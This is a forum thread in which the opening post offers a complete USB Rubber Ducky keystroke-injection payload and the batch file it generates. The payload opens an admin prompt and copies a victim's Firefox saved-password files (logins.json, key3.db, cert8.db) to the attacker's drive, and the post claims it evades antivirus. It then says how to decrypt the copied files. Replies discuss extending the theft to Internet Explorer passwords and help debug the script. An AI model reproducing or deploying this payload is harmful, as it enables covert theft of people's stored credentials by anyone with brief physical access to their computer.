Jump to content

Steal Firefox Passwords using only Batch bypassing the AV.


shamwow
 Share

Recommended Posts

This is for stealing firefox passwords using just Batch because it is not detected by AV.

If someone could make Tutorial on how to make a Batch file to steal Internet Explorer passwords using only Batch or Powershell without triggering AV i would appreciate it.

For this you need the Twin Duck firmware.

You also need to label your ducky drive as the word "DUCKY".

DEFAULT_DELAY 75
DELAY 3000
REM get a cmd prompt this way because it's admin:
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
REM the admin part.
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER

REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat contents
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "ducky"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto while1
ENTER
STRING :break
ENTER
REM
REM FINALLY COPY THE FIREFOX STUFF:
STRING mkdir %myd%\firefox\
ENTER
STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\
ENTER
STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\
ENTER
STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\
ENTER
CONTROL z
ENTER
STRING DuckyWait.bat
ENTER

This is not needed but is the .bat file that the Duck creates in the Temp directory.

:while1
for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
if Exist %myd% (
goto break
)
timeout /t 30
goto while1
:break
mkdir %myd%\firefox\
for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\
for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\
for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\

To open and view the passwords just download Passwordfox.exe from the nirsoft site http://www.nirsoft.net/toolsdownload/passwordfox.zip

Manually select the profile folder that just got created in the Duck inside the new Firefox directory.

Edited by shamwow
Link to comment
Share on other sites

  • 3 weeks later...

This looks really good, good job. I did some superficial research on IE, and it appears that it stores the passwords in the registry. Could be a little more involved to extract such information, and hopefully the pass recovery tools would be able to accept the extracted data. You may have to read the values back into the registry on another computer in order to extract the passwords with a password tool. It should be possible to save as .reg files elsewhere. I am not a registry savant. I don't know though. I was looking at this site;

http://www.majorgeeks.com/content/page/how_to_manage_your_internet_explorer_saved_passwords.html

I think my Win 7 registry is set up a little bit different however, so you would need different payloads for XP, Win 7, and Win 8, or some sort of if statement within the script in order to preform the right operations.

Link to comment
Share on other sites

  • 2 weeks later...

This looks really good, good job. I did some superficial research on IE, and it appears that it stores the passwords in the registry. Could be a little more involved to extract such information, and hopefully the pass recovery tools would be able to accept the extracted data. You may have to read the values back into the registry on another computer in order to extract the passwords with a password tool. It should be possible to save as .reg files elsewhere. I am not a registry savant. I don't know though. I was looking at this site;

http://www.majorgeeks.com/content/page/how_to_manage_your_internet_explorer_saved_passwords.html

I think my Win 7 registry is set up a little bit different however, so you would need different payloads for XP, Win 7, and Win 8, or some sort of if statement within the script in order to preform the right operations.

in windows 7, i can get internet explorer 7, 8, 9 and 10 passwords.

Edited by shamwow
Link to comment
Share on other sites

  • 2 weeks later...

The only "algorithim" that can crack passwords is called a "brute force". If you want to do it in C# you will have to learn about the crypto api (is not as scary as it sounds, buy a data security book for C#, the most current one, will be a little bit old), and you will also have to learn how brute force algorithms work. Think like the odometer in your car. I tried a while back, I am thinking one would get better performance out of a C++ program however. You see, encryption of passwords is made via a one way hash, so there is no reversing it unless you have some Q-bits (like that will ever happen...). Brute force is guessing all possible outcomes. Although you could also do a wordlist crack, is essentially the same thing, except slightly more efficient.

Learn this from my trials, threads are very inefficient to load up, so they can slow things down.

Edited by overwraith
Link to comment
Share on other sites

I have a problem the %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\ opens well, but the way %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default wrote that he could not find, even though I have a folder gofsocms.default. How to solve it?

for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ is a batch script command. you need to include the whole line.

also, first label your duck drive to the word "ducky" for the payload to work.

Edited by shamwow
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...